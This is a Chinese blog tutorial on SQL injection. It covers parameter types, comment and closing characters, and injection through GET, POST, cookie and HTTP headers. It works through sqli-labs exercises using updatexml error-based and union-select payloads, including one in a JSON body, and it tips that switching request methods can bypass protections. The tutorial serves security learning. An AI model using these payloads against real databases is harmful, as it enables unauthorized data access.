12.SQL漏洞-注入类型&请求方法注入

【参数类型】

判断注入类型

1、数字类型

select * from user where id=1

2、字符类型

select * from user where name=‘admin’
过滤’(单引号)和"(双引号)

3、搜索类型

select * from user where name like ‘%admin%’ 只要有admin都会被搜索出来
过滤%(百分号)和’(单引号)
在这里插入图片描述

4、JSON类型

★post提交方式中的一种数据交互格式
JSON格式:
json={“name”:“admin”
“age”:“18”}

$id=1 and 1=2
$sql=“SELECT * FROM users WHERE id=‘1’ and 1=2–+ LIMIT 0,1”;

注释语句

–+、# 注释掉一行
使用POST方式注入大部分用到# 用url注入大部分用到–+

#闭合
必须要将语句闭合,使注入语句生效

#SQL语句干扰符号
'(单引号),"(双引号),%(百分号),)(小括号),}(大括号) 等,具体需看写法

【请求方法】

GET、POST、COOKIE、REQUEST、HTTP头部等

GET请求传输的数据量限制在2KB左右
GET只要在url上,就能接收到请求
REQUEST请求不管是GET和POST都可以
HTTP报文头部各个参数都能注入,比如User-Agent、Cookie

tips: 切换请求方式可能达到绕过防护的效果

【演示实验】

 参数字符型注入测试 sqlilabs Less-1,2,3,4
参考:
https://blog.csdn.net/wang_624/article/details/101913584
 POST数据提交注入测试 sqliabs Less-11

post 发送 不用编码
在这里插入图片描述

 COOKIE数据提交注入测试 sqlilabs Less-20
在这里插入图片描述
报错注入;

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #

在这里插入图片描述
联合查询:
在这里插入图片描述
看样子好像没有

 HTTP头部参数数据注入测试 sqlilabs Less-18

在这里插入图片描述

ad'or updatexml(1,concat(0x7e,(database())),1) or '1'='1

在这里插入图片描述

 参数JSON数据注入测试 https://tianchi.aliyun.com/competition/entrance/531796/information
在这里插入图片描述

json 注入

sql语句是json 格式

单引号只是说明它是字符串; { } 花括号是说明json 格式不影响 sql 语句判断

$sql="select * from users where username='{&username}' ";
            json={"username":"admin' and 1=2 union select 1,2,3#"}        ' (单引号)闭合的是SQL语句中的 '   

‘#’不会注释双引号
看双引号里面的内容,判断注入语句 就行了
admin’ and 1=2 union select 1,2,3#

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值